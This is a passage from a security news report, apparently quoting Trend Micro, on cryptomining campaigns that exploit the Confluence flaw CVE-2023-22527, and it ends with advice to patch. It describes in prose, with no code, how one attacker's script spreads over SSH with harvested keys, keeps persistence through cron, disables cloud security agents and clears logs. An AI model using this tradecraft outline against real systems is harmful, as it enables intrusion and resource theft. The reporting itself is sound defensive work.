<\/a><\/figure><\/div>\n\n\n<\/p>\n\n\n\n
<\/gwmw>Trend Micro states that at least three different threat actors are exploiting the flaw in cryptomining campaigns. The first threat actor is using the XMRig miner to execute miner activity via an ELF file payload. A second threat actor used a shell script to execute cryptocurrency mining activities across all accessible endpoints in the customer environment using Secure Shell (SSH). The script used by the threat actor first terminates known cryptomining processes and those running from temporary directories. It then deletes all cron jobs and adds a new one to maintain command-and-control server connectivity. The script disables security services like Alibaba Cloud Shield and Tencent Cloud mirrors and collects IP addresses, users, and SSH keys to target other systems via SSH for cryptomining. The attacker uses multiple cron jobs to maintain persistence, downloads the XMRig miner, and ensures all security tools are disabled before beginning mining activities. In the last stage of the attack, threat actors clear logs and bash history to remove traces of their activities.<\/p>\n\n\n\n
“With its continuous exploitation by threat actors, CVE-2023-22527 presents a significant security risk to organizations worldwide. To minimize the risks and threats associated with this vulnerability, administrators should update their versions of Confluence Data Center and Confluence Server to the latest available versions as soon as possible.” concludes the report.<\/p>\n\n\n\n
Organizations are urged to update their Confluence instances and implement security best practices to protect their systems.<\/p>\n\n\n\n